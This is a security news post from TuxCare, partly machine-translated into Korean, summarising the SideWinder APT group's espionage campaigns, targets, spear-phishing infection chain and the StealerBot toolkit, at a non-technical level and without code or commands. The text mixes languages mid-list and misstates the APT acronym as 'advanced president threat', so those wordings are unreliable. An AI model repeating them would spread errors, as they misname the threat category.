ClickCease SideWinder APT Attacks Entities In Middle East And Africa - TuxCare

인기 뉴스레터 구독하기

4,500명 이상의 Linux 및 오픈 소스 전문가와 함께하세요!

한 달에 두 번. 스팸이 없습니다.

SideWinder APT Attacks Entities In Middle East And Africa

by 와자핫 라자

October 29, 2024 - TuxCare expert team

Recent reports have claimed that an advanced president threat (APT) group with ties to India has launched multiple attacks in the Middle East and Africa. The threat actor group, being referred to as the SideWinder APT, has mainly targeted high-profile entities. In this article, we’ll dive into the attacks and uncover the exploited flaws. Let’s begin! 

The SideWinder APT Attack Group Unveiled  

Before diving into the details of the group, it’s worth mentioning that SideWinder APT threat actor goes by multiple names that include APT-C-17, Baby Elephant, Hardcore Nationalist, Leafperforator, Rattlesnake, Razor Tiger, and T-APT-04. Providing further insights about the threat actor, cyber security researchers from Kaspersky have stated that: 

“The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations.”

As per recent reports, the SideWinder APT has targeted various sectors in multiple countries that include: 

Sectors  Countries 
  • 정부. 
  • Military entities. 
  • Logistics Infrastructure 
  • Telecommunications companies. 
  • 금융 기관. 
  • Universities. 
  • Oil trading companies.
  • 방글라데시.
  • Djibouti. 
  • Jordan. 
  • 말레이시아. 
  • The Maldives. 
  • Myanmar. 
  • 네팔. 
  • 파키스탄.
  • Saudi Arabia. 
  • 스리랑카. 
  • Turkey. 
  • U.A.E.

 

Apart from these targets, the threat actors have also been observed targeting diplomatic entities pertaining to Afghanistan, France, China, India, Indonesia, and Morocco.

Details Of The Attack Campaign 

One of the key aspects of the SideWinder APT attack campaigns is its use of a multi-stage infection chain. This infection chain is designed to deliver a post-exploitation toolkit called StealerBot. Attacks orchestrated by the SideWinder APT hacker start with a spear-phishing email. The email contains one of two payloads mentioned below. 

  1. A ZIP archive with a Windows shortcut (LNK) file.
  2. A Microsoft Word document.

Either of these payloads can be used for executing JavaScript and .NET downloads which deploy the StealerBot malware. While the Word document relies on remote template injections and exploits CVE-2017-11882, the LNK file uses the mshta.exe utility to run JavaScript code.

As of now, media reports have stated that the end goal of the SideWinder APT attacks is to aid espionage by fetching plugins that be used for various malicious initiatives like:  

  • Install additional malware. 
  • Acquiring screenshots.
  • 키 입력 기록.
  • Stealing passwords and files.
  • Intercepting RDP credentials.
  • Starting reverse shell.
  • Phishing Windows credentials.
  • Escalating privileges. 

결론 

The SideWinder APT group’s sophisticated multi-stage attacks highlight its evolving capabilities in espionage and cyber warfare. By targeting high-profile sectors and leveraging tools like StealerBot, the group poses a significant threat to global cybersecurity, requiring vigilant defenses and advanced countermeasures to mitigate its impact.

The sources for this piece include articles in The Hacker News and Kaspersky.

Kernel 재부팅, 시스템 다운타임 또는 예정된 유지 보수 기간 없이 취약성 패치를 자동화하고 싶으신가요?

TuxCare 게스트 작가 되기

메일

가입

4,500

Linux & 오픈 소스
전문가!


뉴스레터 구독하기